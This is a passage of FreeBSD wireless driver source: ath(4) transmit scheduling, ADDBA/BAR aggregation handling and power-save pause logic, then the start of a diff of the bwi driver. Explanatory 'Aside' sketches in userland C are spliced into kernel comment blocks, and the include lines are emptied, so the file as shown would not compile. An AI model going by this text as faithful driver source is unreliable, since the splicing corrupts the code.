ath_softc *sc, struct ath_txq *txq) { struct ath_tid *tid, *next, *last; ATH_TX_LOCK_ASSERT(sc); /* * Don't schedule if the hardware queue is busy. * This (hopefully) gives some more time to aggregate * some packets in the aggregation queue. * * XXX It doesn't stop a parallel sender from sneaking * in transmitting a frame! 
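(Aside: ath_txq_sched() services the active TIDs as a FIFO: each TID is unscheduled, given a chance to queue frames, and re-appended to the tail if it still has traffic; remembering which entry was last when the pass started keeps re-appended TIDs from being serviced twice in one pass. A compact userland sketch of that round-robin idea follows, with hypothetical types and a made-up per-pass budget.)

#include <sys/queue.h>
#include <stdio.h>

struct tid {
        int id;
        int backlog;                    /* frames still waiting in the software queue */
        TAILQ_ENTRY(tid) link;
};
TAILQ_HEAD(tidhead, tid);

/* Pretend to transmit up to 'budget' frames from a TID; return frames left. */
static int
service(struct tid *t, int budget)
{
        int tx = t->backlog < budget ? t->backlog : budget;

        t->backlog -= tx;
        printf("tid %d: sent %d, %d left\n", t->id, tx, t->backlog);
        return (t->backlog);
}

static void
sched_pass(struct tidhead *active)
{
        struct tid *t, *next, *last;

        /* Remember the tail so TIDs re-appended below aren't serviced again this pass. */
        last = TAILQ_LAST(active, tidhead);
        TAILQ_FOREACH_SAFE(t, active, link, next) {
                TAILQ_REMOVE(active, t, link);
                if (service(t, 2) != 0)
                        TAILQ_INSERT_TAIL(active, t, link);     /* still busy: back of the line */
                if (t == last)
                        break;
        }
}

int
main(void)
{
        struct tidhead active = TAILQ_HEAD_INITIALIZER(active);
        struct tid a = { .id = 0, .backlog = 3 };
        struct tid b = { .id = 5, .backlog = 1 };

        TAILQ_INSERT_TAIL(&active, &a, link);
        TAILQ_INSERT_TAIL(&active, &b, link);

        sched_pass(&active);            /* services tid 0 and tid 5 once each */
        sched_pass(&active);            /* tid 0 still had one frame left */
        return (0);
}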
*/ /* XXX TXQ locking */ if (txq->axq_aggr_depth + txq->fifo.axq_depth >= sc->sc_hwq_limit_aggr) { sc->sc_aggr_stats.aggr_sched_nopkt++; return; } if (txq->axq_depth >= sc->sc_hwq_limit_nonaggr) { sc->sc_aggr_stats.aggr_sched_nopkt++; return; } last = TAILQ_LAST(&txq->axq_tidq, axq_t_s); TAILQ_FOREACH_SAFE(tid, &txq->axq_tidq, axq_qelem, next) { /* * Suspend paused queues here; they'll be resumed * once the addba completes or times out. */ DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: tid=%d, paused=%d\n", __func__, tid->tid, tid->paused); ath_tx_tid_unsched(sc, tid); /* * This node may be in power-save and we're leaking * a frame; be careful. */ if (! ath_tx_tid_can_tx_or_sched(sc, tid)) { continue; } if (ath_tx_ampdu_running(sc, tid->an, tid->tid)) ath_tx_tid_hw_queue_aggr(sc, tid->an, tid); else ath_tx_tid_hw_queue_norm(sc, tid->an, tid); /* Not empty? Re-schedule */ if (tid->axq_depth != 0) ath_tx_tid_sched(sc, tid); /* * Give the software queue time to aggregate more * packets. If we aren't running aggregation then * we should still limit the hardware queue depth. */ /* XXX TXQ locking */ if (txq->axq_aggr_depth + txq->fifo.axq_depth >= sc->sc_hwq_limit_aggr) { break; } if (txq->axq_depth >= sc->sc_hwq_limit_nonaggr) { break; } /* * If this was the last entry on the original list, stop. * Otherwise nodes that have been rescheduled onto the end * of the TID FIFO list will just keep being rescheduled. * * XXX What should we do about nodes that were paused * but are pending a leaking frame in response to a ps-poll? * They'll be put at the front of the list; so they'll * prematurely trigger this condition! Ew. */ if (tid == last) break; } } /* * TX addba handling */ /* * Return net80211 TID struct pointer, or NULL for none */ struct ieee80211_tx_ampdu * ath_tx_get_tx_tid(struct ath_node *an, int tid) { struct ieee80211_node *ni = &an->an_node; struct ieee80211_tx_ampdu *tap; if (tid == IEEE80211_NONQOS_TID) return NULL; tap = &ni->ni_tx_ampdu[tid]; return tap; } /* * Is AMPDU-TX running? */ static int ath_tx_ampdu_running(struct ath_softc *sc, struct ath_node *an, int tid) { struct ieee80211_tx_ampdu *tap; if (tid == IEEE80211_NONQOS_TID) return 0; tap = ath_tx_get_tx_tid(an, tid); if (tap == NULL) return 0; /* Not valid; default to not running */ return !! (tap->txa_flags & IEEE80211_AGGR_RUNNING); } /* * Is AMPDU-TX negotiation pending? */ static int ath_tx_ampdu_pending(struct ath_softc *sc, struct ath_node *an, int tid) { struct ieee80211_tx_ampdu *tap; if (tid == IEEE80211_NONQOS_TID) return 0; tap = ath_tx_get_tx_tid(an, tid); if (tap == NULL) return 0; /* Not valid; default to not pending */ return !! (tap->txa_flags & IEEE80211_AGGR_XCHGPEND); } /* * Is AMPDU-TX pending for the given TID? */ /* * Method to handle sending an ADDBA request. * * We tap this so the relevant flags can be set to pause the TID * whilst waiting for the response. * * XXX there's no timeout handler we can override? */ int ath_addba_request(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap, int dialogtoken, int baparamset, int batimeout) { struct ath_softc *sc = ni->ni_ic->ic_ifp->if_softc; int tid = tap->txa_tid; struct ath_node *an = ATH_NODE(ni); struct ath_tid *atid = &an->an_tid[tid]; /* * XXX danger Will Robinson! * * Although the taskqueue may be running and scheduling some more * packets, these should all be _before_ the addba sequence number. * However, net80211 will keep self-assigning sequence numbers * until addba has been negotiated. 
* * In the past, these packets would be "paused" (which still works * fine, as they're being scheduled to the driver in the same * serialised method which is calling the addba request routine) * and when the aggregation session begins, they'll be dequeued * as aggregate packets and added to the BAW. However, now there's * a "bf->bf_state.bfs_dobaw" flag, and this isn't set for these * packets. Thus they never get included in the BAW tracking and * this can cause the initial burst of packets after the addba * negotiation to "hang", as they quickly fall outside the BAW. * * The "eventual" solution should be to tag these packets with * dobaw. Although net80211 has given us a sequence number, * it'll be "after" the left edge of the BAW and thus it'll * fall within it. */ ATH_TX_LOCK(sc); /* * This is a bit annoying. Until net80211 HT code inherits some * (any) locking, we may have this called in parallel BUT only * one response/timeout will be called. Grr. */ if (atid->addba_tx_pending == 0) { ath_tx_tid_pause(sc, atid); atid->addba_tx_pending = 1; } ATH_TX_UNLOCK(sc); DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: %6D: called; dialogtoken=%d, baparamset=%d, batimeout=%d\n", __func__, ni->ni_macaddr, ":", dialogtoken, baparamset, batimeout); DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: txa_start=%d, ni_txseqs=%d\n", __func__, tap->txa_start, ni->ni_txseqs[tid]); return sc->sc_addba_request(ni, tap, dialogtoken, baparamset, batimeout); } /* * Handle an ADDBA response. * * We unpause the queue so TX'ing can resume. * * Any packets TX'ed from this point should be "aggregate" (whether * aggregate or not) so the BAW is updated. * * Note! net80211 keeps self-assigning sequence numbers until * ampdu is negotiated. This means the initially-negotiated BAW left * edge won't match the ni->ni_txseq. * * So, being very dirty, the BAW left edge is "slid" here to match * ni->ni_txseq. * * What likely SHOULD happen is that all packets subsequent to the * addba request should be tagged as aggregate and queued as non-aggregate * frames; thus updating the BAW. For now though, I'll just slide the * window. */ int ath_addba_response(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap, int status, int code, int batimeout) { struct ath_softc *sc = ni->ni_ic->ic_ifp->if_softc; int tid = tap->txa_tid; struct ath_node *an = ATH_NODE(ni); struct ath_tid *atid = &an->an_tid[tid]; int r; DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: %6D: called; status=%d, code=%d, batimeout=%d\n", __func__, ni->ni_macaddr, ":", status, code, batimeout); DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: txa_start=%d, ni_txseqs=%d\n", __func__, tap->txa_start, ni->ni_txseqs[tid]); /* * Call this first, so the interface flags get updated * before the TID is unpaused. Otherwise a race condition * exists where the unpaused TID still doesn't yet have * IEEE80211_AGGR_RUNNING set. */ r = sc->sc_addba_response(ni, tap, status, code, batimeout); ATH_TX_LOCK(sc); atid->addba_tx_pending = 0; /* * XXX dirty! * Slide the BAW left edge to wherever net80211 left it for us. * Read above for more information. */ tap->txa_start = ni->ni_txseqs[tid]; ath_tx_tid_resume(sc, atid); ATH_TX_UNLOCK(sc); return r; } /* * Stop ADDBA on a queue. * * This can be called whilst BAR TX is currently active on the queue, * so make sure this is unblocked before continuing. 
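(Aside: the ADDBA handling above pauses the TID exactly once when the request goes out, guarded by addba_tx_pending, and resumes it when the response or its timeout arrives, so the pause/resume pair stays balanced even if the request path is entered more than once. A small sketch of that guard, with hypothetical state names.)

#include <stdio.h>

/* Hypothetical per-TID state: a pause refcount plus an "ADDBA pending" flag. */
struct tid_state {
        int paused;                     /* >0 means no frames may be scheduled */
        int addba_pending;              /* 1 while a negotiation is outstanding */
};

/* Called when an ADDBA request goes out; pause exactly once per negotiation. */
static void
addba_request(struct tid_state *t)
{
        if (!t->addba_pending) {
                t->addba_pending = 1;
                t->paused++;
        }
}

/* Called on the ADDBA response (or its timeout); undo that single pause. */
static void
addba_response(struct tid_state *t)
{
        if (t->addba_pending) {
                t->addba_pending = 0;
                if (t->paused > 0)
                        t->paused--;
        }
}

int
main(void)
{
        struct tid_state t = { 0, 0 };

        addba_request(&t);
        addba_request(&t);              /* a duplicate request must not pause twice */
        printf("paused=%d\n", t.paused);        /* 1 */
        addba_response(&t);
        printf("paused=%d\n", t.paused);        /* 0: the TID can be rescheduled */
        return (0);
}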
*/ void ath_addba_stop(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap) { struct ath_softc *sc = ni->ni_ic->ic_ifp->if_softc; int tid = tap->txa_tid; struct ath_node *an = ATH_NODE(ni); struct ath_tid *atid = &an->an_tid[tid]; ath_bufhead bf_cq; struct ath_buf *bf; DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: %6D: called\n", __func__, ni->ni_macaddr, ":"); /* * Pause TID traffic early, so there aren't any races * Unblock the pending BAR held traffic, if it's currently paused. */ ATH_TX_LOCK(sc); ath_tx_tid_pause(sc, atid); if (atid->bar_wait) { /* * bar_unsuspend() expects bar_tx == 1, as it should be * called from the TX completion path. This quietens * the warning. It's cleared for us anyway. */ atid->bar_tx = 1; ath_tx_tid_bar_unsuspend(sc, atid); } ATH_TX_UNLOCK(sc); /* There's no need to hold the TXQ lock here */ sc->sc_addba_stop(ni, tap); /* * ath_tx_tid_cleanup will resume the TID if possible, otherwise * it'll set the cleanup flag, and it'll be unpaused once * things have been cleaned up. */ TAILQ_INIT(&bf_cq); ATH_TX_LOCK(sc); ath_tx_tid_cleanup(sc, an, tid, &bf_cq); /* * Unpause the TID if no cleanup is required. */ if (! atid->cleanup_inprogress) ath_tx_tid_resume(sc, atid); ATH_TX_UNLOCK(sc); /* Handle completing frames and fail them */ while ((bf = TAILQ_FIRST(&bf_cq)) != NULL) { TAILQ_REMOVE(&bf_cq, bf, bf_list); ath_tx_default_comp(sc, bf, 1); } } /* * Handle a node reassociation. * * We may have a bunch of frames queued to the hardware; those need * to be marked as cleanup. */ void ath_tx_node_reassoc(struct ath_softc *sc, struct ath_node *an) { struct ath_tid *tid; int i; ath_bufhead bf_cq; struct ath_buf *bf; TAILQ_INIT(&bf_cq); ATH_TX_UNLOCK_ASSERT(sc); ATH_TX_LOCK(sc); for (i = 0; i < IEEE80211_TID_SIZE; i++) { tid = &an->an_tid[i]; if (tid->hwq_depth == 0) continue; ath_tx_tid_pause(sc, tid); DPRINTF(sc, ATH_DEBUG_NODE, "%s: %6D: TID %d: cleaning up TID\n", __func__, an->an_node.ni_macaddr, ":", i); ath_tx_tid_cleanup(sc, an, i, &bf_cq); /* * Unpause the TID if no cleanup is required. */ if (! tid->cleanup_inprogress) ath_tx_tid_resume(sc, tid); } ATH_TX_UNLOCK(sc); /* Handle completing frames and fail them */ while ((bf = TAILQ_FIRST(&bf_cq)) != NULL) { TAILQ_REMOVE(&bf_cq, bf, bf_list); ath_tx_default_comp(sc, bf, 1); } } /* * Note: net80211 bar_timeout() doesn't call this function on BAR failure; * it simply tears down the aggregation session. Ew. * * It however will call ieee80211_ampdu_stop() which will call * ic->ic_addba_stop(). * * XXX This uses a hard-coded max BAR count value; the whole * XXX BAR TX success or failure should be better handled! */ void ath_bar_response(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap, int status) { struct ath_softc *sc = ni->ni_ic->ic_ifp->if_softc; int tid = tap->txa_tid; struct ath_node *an = ATH_NODE(ni); struct ath_tid *atid = &an->an_tid[tid]; int attempts = tap->txa_attempts; DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: %6D: called; txa_tid=%d, atid->tid=%d, status=%d, attempts=%d\n", __func__, ni->ni_macaddr, ":", tap->txa_tid, atid->tid, status, attempts); /* Note: This may update the BAW details */ sc->sc_bar_response(ni, tap, status); /* Unpause the TID */ /* * XXX if this is attempt=50, the TID will be downgraded * XXX to a non-aggregate session. So we must unpause the * XXX TID here or it'll never be done. * * Also, don't call it if bar_tx/bar_wait are 0; something * has beaten us to the punch? (XXX figure out what?) 
*/ if (status == 0 || attempts == 50) { ATH_TX_LOCK(sc); if (atid->bar_tx == 0 || atid->bar_wait == 0) DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: huh? bar_tx=%d, bar_wait=%d\n", __func__, atid->bar_tx, atid->bar_wait); else ath_tx_tid_bar_unsuspend(sc, atid); ATH_TX_UNLOCK(sc); } } /* * This is called whenever the pending ADDBA request times out. * Unpause and reschedule the TID. */ void ath_addba_response_timeout(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap) { struct ath_softc *sc = ni->ni_ic->ic_ifp->if_softc; int tid = tap->txa_tid; struct ath_node *an = ATH_NODE(ni); struct ath_tid *atid = &an->an_tid[tid]; DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: %6D: TID=%d, called; resuming\n", __func__, ni->ni_macaddr, ":", tid); ATH_TX_LOCK(sc); atid->addba_tx_pending = 0; ATH_TX_UNLOCK(sc); /* Note: This updates the aggregate state to (again) pending */ sc->sc_addba_response_timeout(ni, tap); /* Unpause the TID; which reschedules it */ ATH_TX_LOCK(sc); ath_tx_tid_resume(sc, atid); ATH_TX_UNLOCK(sc); } /* * Check if a node is asleep or not. */ int ath_tx_node_is_asleep(struct ath_softc *sc, struct ath_node *an) { ATH_TX_LOCK_ASSERT(sc); return (an->an_is_powersave); } /* * Mark a node as currently "in powersaving." * This suspends all traffic on the node. * * This must be called with the node/tx locks free. * * XXX TODO: the locking silliness below is due to how the node * locking currently works. Right now, the node lock is grabbed * to do rate control lookups and these are done with the TX * queue lock held. This means the node lock can't be grabbed * first here or a LOR will occur. * * Eventually (hopefully!) the TX path code will only grab * the TXQ lock when transmitting and the ath_node lock when * doing node/TID operations. There are other complications - * the sched/unsched operations involve walking the per-txq * 'active tid' list and this requires both locks to be held. */ void ath_tx_node_sleep(struct ath_softc *sc, struct ath_node *an) { struct ath_tid *atid; struct ath_txq *txq; int tid; ATH_TX_UNLOCK_ASSERT(sc); /* Suspend all traffic on the node */ ATH_TX_LOCK(sc); if (an->an_is_powersave) { DPRINTF(sc, ATH_DEBUG_XMIT, "%s: %6D: node was already asleep!\n", __func__, an->an_node.ni_macaddr, ":"); ATH_TX_UNLOCK(sc); return; } for (tid = 0; tid < IEEE80211_TID_SIZE; tid++) { atid = &an->an_tid[tid]; txq = sc->sc_ac2q[atid->ac]; ath_tx_tid_pause(sc, atid); } /* Mark node as in powersaving */ an->an_is_powersave = 1; ATH_TX_UNLOCK(sc); } /* * Mark a node as currently "awake." * This resumes all traffic to the node. */ void ath_tx_node_wakeup(struct ath_softc *sc, struct ath_node *an) { struct ath_tid *atid; struct ath_txq *txq; int tid; ATH_TX_UNLOCK_ASSERT(sc); ATH_TX_LOCK(sc); /* !? */ if (an->an_is_powersave == 0) { ATH_TX_UNLOCK(sc); DPRINTF(sc, ATH_DEBUG_XMIT, "%s: an=%p: node was already awake\n", __func__, an); return; } /* Mark node as awake */ an->an_is_powersave = 0; /* * Clear any pending leaked frame requests */ an->an_leak_count = 0; for (tid = 0; tid < IEEE80211_TID_SIZE; tid++) { atid = &an->an_tid[tid]; txq = sc->sc_ac2q[atid->ac]; ath_tx_tid_resume(sc, atid); } ATH_TX_UNLOCK(sc); } static int ath_legacy_dma_txsetup(struct ath_softc *sc) { /* nothing new needed */ return (0); } static int ath_legacy_dma_txteardown(struct ath_softc *sc) { /* nothing new needed */ return (0); } void ath_xmit_setup_legacy(struct ath_softc *sc) { /* * For now, just set the descriptor length to sizeof(ath_desc); * worry about extracting the real length out of the HAL later. 
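(Aside: ath_tx_node_sleep()/ath_tx_node_wakeup() above pause and resume every TID on the node, and the same pause primitive is used by the ADDBA and BAR paths; keeping it as a counter rather than a flag lets those pausers overlap safely. A small sketch of that idea with hypothetical names and a trimmed TID count.)

#include <stdio.h>

#define NUM_TIDS 4                      /* trimmed for the sketch; a real node has 16 QoS TIDs */

struct node_state {
        int is_powersave;
        int tid_paused[NUM_TIDS];       /* per-TID pause refcounts */
};

static void
tid_pause(struct node_state *n, int tid)
{
        n->tid_paused[tid]++;
}

/* Traffic may only flow again once every pauser has released its hold. */
static void
tid_resume(struct node_state *n, int tid)
{
        if (n->tid_paused[tid] > 0)
                n->tid_paused[tid]--;
        if (n->tid_paused[tid] == 0)
                printf("tid %d: reschedulable again\n", tid);
}

static void
node_sleep(struct node_state *n)
{
        if (n->is_powersave)
                return;                 /* already asleep; don't pause twice */
        n->is_powersave = 1;
        for (int tid = 0; tid < NUM_TIDS; tid++)
                tid_pause(n, tid);
}

static void
node_wakeup(struct node_state *n)
{
        if (!n->is_powersave)
                return;
        n->is_powersave = 0;
        for (int tid = 0; tid < NUM_TIDS; tid++)
                tid_resume(n, tid);
}

int
main(void)
{
        struct node_state n = { 0, { 0 } };

        tid_pause(&n, 0);               /* e.g. an ADDBA negotiation holds TID 0 */
        node_sleep(&n);
        node_wakeup(&n);                /* TID 0 stays paused: the ADDBA hold remains */
        tid_resume(&n, 0);              /* now TID 0 becomes reschedulable */
        return (0);
}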
*/ sc->sc_tx_desclen = sizeof(struct ath_desc); sc->sc_tx_statuslen = sizeof(struct ath_desc); sc->sc_tx_nmaps = 1; /* only one buffer per TX desc */ sc->sc_tx.xmit_setup = ath_legacy_dma_txsetup; sc->sc_tx.xmit_teardown = ath_legacy_dma_txteardown; sc->sc_tx.xmit_attach_comp_func = ath_legacy_attach_comp_func; sc->sc_tx.xmit_dma_restart = ath_legacy_tx_dma_restart; sc->sc_tx.xmit_handoff = ath_legacy_xmit_handoff; sc->sc_tx.xmit_drain = ath_legacy_tx_drain; } diff --git a/sys/dev/bwi/if_bwi.c b/sys/dev/bwi/if_bwi.c index c43eed786778..ca9612e93436 100644 --- a/sys/dev/bwi/if_bwi.c +++ b/sys/dev/bwi/if_bwi.c @@ -1,4057 +1,4057 @@ /* * Copyright (c) 2007 The DragonFly Project. All rights reserved. * * This code is derived from software contributed to The DragonFly Project * by Sepherosa Ziehau * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * 3. Neither the name of The DragonFly Project nor the names of its * contributors may be used to endorse or promote products derived * from this software without specific, prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE * COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY OR CONSEQUENTIAL DAMAGES (INCLUDING, * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT * OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
* * $DragonFly: src/sys/dev/netif/bwi/if_bwi.c,v 1.19 2008/02/15 11:15:38 sephe Exp $ */ #include __FBSDID("$FreeBSD$"); #include "opt_inet.h" #include "opt_bwi.h" #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef INET #include #include #endif #include #include #include #include #include #include #include #include struct bwi_clock_freq { u_int clkfreq_min; u_int clkfreq_max; }; struct bwi_myaddr_bssid { uint8_t myaddr[IEEE80211_ADDR_LEN]; uint8_t bssid[IEEE80211_ADDR_LEN]; } __packed; static struct ieee80211vap *bwi_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void bwi_vap_delete(struct ieee80211vap *); static void bwi_init(void *); static int bwi_ioctl(struct ifnet *, u_long, caddr_t); static void bwi_start(struct ifnet *); static void bwi_start_locked(struct ifnet *); static int bwi_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void bwi_watchdog(void *); static void bwi_scan_start(struct ieee80211com *); static void bwi_set_channel(struct ieee80211com *); static void bwi_scan_end(struct ieee80211com *); static int bwi_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void bwi_updateslot(struct ifnet *); static int bwi_media_change(struct ifnet *); static void bwi_calibrate(void *); static int bwi_calc_rssi(struct bwi_softc *, const struct bwi_rxbuf_hdr *); static int bwi_calc_noise(struct bwi_softc *); static __inline uint8_t bwi_plcp2rate(uint32_t, enum ieee80211_phytype); static void bwi_rx_radiotap(struct bwi_softc *, struct mbuf *, struct bwi_rxbuf_hdr *, const void *, int, int, int); static void bwi_restart(void *, int); static void bwi_init_statechg(struct bwi_softc *, int); static void bwi_stop(struct bwi_softc *, int); static void bwi_stop_locked(struct bwi_softc *, int); static int bwi_newbuf(struct bwi_softc *, int, int); static int bwi_encap(struct bwi_softc *, int, struct mbuf *, struct ieee80211_node *); static int bwi_encap_raw(struct bwi_softc *, int, struct mbuf *, struct ieee80211_node *, const struct ieee80211_bpf_params *); static void bwi_init_rxdesc_ring32(struct bwi_softc *, uint32_t, bus_addr_t, int, int); static void bwi_reset_rx_ring32(struct bwi_softc *, uint32_t); static int bwi_init_tx_ring32(struct bwi_softc *, int); static int bwi_init_rx_ring32(struct bwi_softc *); static int bwi_init_txstats32(struct bwi_softc *); static void bwi_free_tx_ring32(struct bwi_softc *, int); static void bwi_free_rx_ring32(struct bwi_softc *); static void bwi_free_txstats32(struct bwi_softc *); static void bwi_setup_rx_desc32(struct bwi_softc *, int, bus_addr_t, int); static void bwi_setup_tx_desc32(struct bwi_softc *, struct bwi_ring_data *, int, bus_addr_t, int); static int bwi_rxeof32(struct bwi_softc *); static void bwi_start_tx32(struct bwi_softc *, uint32_t, int); static void bwi_txeof_status32(struct bwi_softc *); static int bwi_init_tx_ring64(struct bwi_softc *, int); static int bwi_init_rx_ring64(struct bwi_softc *); static int bwi_init_txstats64(struct bwi_softc *); static void bwi_free_tx_ring64(struct bwi_softc *, int); static void bwi_free_rx_ring64(struct bwi_softc *); static void bwi_free_txstats64(struct bwi_softc *); static void bwi_setup_rx_desc64(struct bwi_softc 
*, int, bus_addr_t, int); static void bwi_setup_tx_desc64(struct bwi_softc *, struct bwi_ring_data *, int, bus_addr_t, int); static int bwi_rxeof64(struct bwi_softc *); static void bwi_start_tx64(struct bwi_softc *, uint32_t, int); static void bwi_txeof_status64(struct bwi_softc *); static int bwi_rxeof(struct bwi_softc *, int); static void _bwi_txeof(struct bwi_softc *, uint16_t, int, int); static void bwi_txeof(struct bwi_softc *); static void bwi_txeof_status(struct bwi_softc *, int); static void bwi_enable_intrs(struct bwi_softc *, uint32_t); static void bwi_disable_intrs(struct bwi_softc *, uint32_t); static int bwi_dma_alloc(struct bwi_softc *); static void bwi_dma_free(struct bwi_softc *); static int bwi_dma_ring_alloc(struct bwi_softc *, bus_dma_tag_t, struct bwi_ring_data *, bus_size_t, uint32_t); static int bwi_dma_mbuf_create(struct bwi_softc *); static void bwi_dma_mbuf_destroy(struct bwi_softc *, int, int); static int bwi_dma_txstats_alloc(struct bwi_softc *, uint32_t, bus_size_t); static void bwi_dma_txstats_free(struct bwi_softc *); static void bwi_dma_ring_addr(void *, bus_dma_segment_t *, int, int); static void bwi_dma_buf_addr(void *, bus_dma_segment_t *, int, bus_size_t, int); static void bwi_power_on(struct bwi_softc *, int); static int bwi_power_off(struct bwi_softc *, int); static int bwi_set_clock_mode(struct bwi_softc *, enum bwi_clock_mode); static int bwi_set_clock_delay(struct bwi_softc *); static void bwi_get_clock_freq(struct bwi_softc *, struct bwi_clock_freq *); static int bwi_get_pwron_delay(struct bwi_softc *sc); static void bwi_set_addr_filter(struct bwi_softc *, uint16_t, const uint8_t *); static void bwi_set_bssid(struct bwi_softc *, const uint8_t *); static void bwi_get_card_flags(struct bwi_softc *); static void bwi_get_eaddr(struct bwi_softc *, uint16_t, uint8_t *); static int bwi_bus_attach(struct bwi_softc *); static int bwi_bbp_attach(struct bwi_softc *); static int bwi_bbp_power_on(struct bwi_softc *, enum bwi_clock_mode); static void bwi_bbp_power_off(struct bwi_softc *); static const char *bwi_regwin_name(const struct bwi_regwin *); static uint32_t bwi_regwin_disable_bits(struct bwi_softc *); static void bwi_regwin_info(struct bwi_softc *, uint16_t *, uint8_t *); static int bwi_regwin_select(struct bwi_softc *, int); static void bwi_led_attach(struct bwi_softc *); static void bwi_led_newstate(struct bwi_softc *, enum ieee80211_state); static void bwi_led_event(struct bwi_softc *, int); static void bwi_led_blink_start(struct bwi_softc *, int, int); static void bwi_led_blink_next(void *); static void bwi_led_blink_end(void *); static const struct { uint16_t did_min; uint16_t did_max; uint16_t bbp_id; } bwi_bbpid_map[] = { { 0x4301, 0x4301, 0x4301 }, { 0x4305, 0x4307, 0x4307 }, { 0x4402, 0x4403, 0x4402 }, { 0x4610, 0x4615, 0x4610 }, { 0x4710, 0x4715, 0x4710 }, { 0x4720, 0x4725, 0x4309 } }; static const struct { uint16_t bbp_id; int nregwin; } bwi_regwin_count[] = { { 0x4301, 5 }, { 0x4306, 6 }, { 0x4307, 5 }, { 0x4310, 8 }, { 0x4401, 3 }, { 0x4402, 3 }, { 0x4610, 9 }, { 0x4704, 9 }, { 0x4710, 9 }, { 0x5365, 7 } }; #define CLKSRC(src) \ [BWI_CLKSRC_ ## src] = { \ .freq_min = BWI_CLKSRC_ ##src## _FMIN, \ .freq_max = BWI_CLKSRC_ ##src## _FMAX \ } static const struct { u_int freq_min; u_int freq_max; } bwi_clkfreq[BWI_CLKSRC_MAX] = { CLKSRC(LP_OSC), CLKSRC(CS_OSC), CLKSRC(PCI) }; #undef CLKSRC #define VENDOR_LED_ACT(vendor) \ { \ .vid = PCI_VENDOR_##vendor, \ .led_act = { BWI_VENDOR_LED_ACT_##vendor } \ } static const struct { #define PCI_VENDOR_COMPAQ 
0x0e11 #define PCI_VENDOR_LINKSYS 0x1737 uint16_t vid; uint8_t led_act[BWI_LED_MAX]; } bwi_vendor_led_act[] = { VENDOR_LED_ACT(COMPAQ), VENDOR_LED_ACT(LINKSYS) #undef PCI_VENDOR_LINKSYS #undef PCI_VENDOR_COMPAQ }; static const uint8_t bwi_default_led_act[BWI_LED_MAX] = { BWI_VENDOR_LED_ACT_DEFAULT }; #undef VENDOR_LED_ACT static const struct { int on_dur; int off_dur; } bwi_led_duration[109] = { [0] = { 400, 100 }, [2] = { 150, 75 }, [4] = { 90, 45 }, [11] = { 66, 34 }, [12] = { 53, 26 }, [18] = { 42, 21 }, [22] = { 35, 17 }, [24] = { 32, 16 }, [36] = { 21, 10 }, [48] = { 16, 8 }, [72] = { 11, 5 }, [96] = { 9, 4 }, [108] = { 7, 3 } }; #ifdef BWI_DEBUG #ifdef BWI_DEBUG_VERBOSE static uint32_t bwi_debug = BWI_DBG_ATTACH | BWI_DBG_INIT | BWI_DBG_TXPOWER; #else static uint32_t bwi_debug; #endif TUNABLE_INT("hw.bwi.debug", (int *)&bwi_debug); #endif /* BWI_DEBUG */ static const uint8_t bwi_zero_addr[IEEE80211_ADDR_LEN]; uint16_t bwi_read_sprom(struct bwi_softc *sc, uint16_t ofs) { return CSR_READ_2(sc, ofs + BWI_SPROM_START); } static __inline void bwi_setup_desc32(struct bwi_softc *sc, struct bwi_desc32 *desc_array, int ndesc, int desc_idx, bus_addr_t paddr, int buf_len, int tx) { struct bwi_desc32 *desc = &desc_array[desc_idx]; uint32_t ctrl, addr, addr_hi, addr_lo; addr_lo = __SHIFTOUT(paddr, BWI_DESC32_A_ADDR_MASK); addr_hi = __SHIFTOUT(paddr, BWI_DESC32_A_FUNC_MASK); addr = __SHIFTIN(addr_lo, BWI_DESC32_A_ADDR_MASK) | __SHIFTIN(BWI_DESC32_A_FUNC_TXRX, BWI_DESC32_A_FUNC_MASK); ctrl = __SHIFTIN(buf_len, BWI_DESC32_C_BUFLEN_MASK) | __SHIFTIN(addr_hi, BWI_DESC32_C_ADDRHI_MASK); if (desc_idx == ndesc - 1) ctrl |= BWI_DESC32_C_EOR; if (tx) { /* XXX */ ctrl |= BWI_DESC32_C_FRAME_START | BWI_DESC32_C_FRAME_END | BWI_DESC32_C_INTR; } desc->addr = htole32(addr); desc->ctrl = htole32(ctrl); } int bwi_attach(struct bwi_softc *sc) { struct ieee80211com *ic; device_t dev = 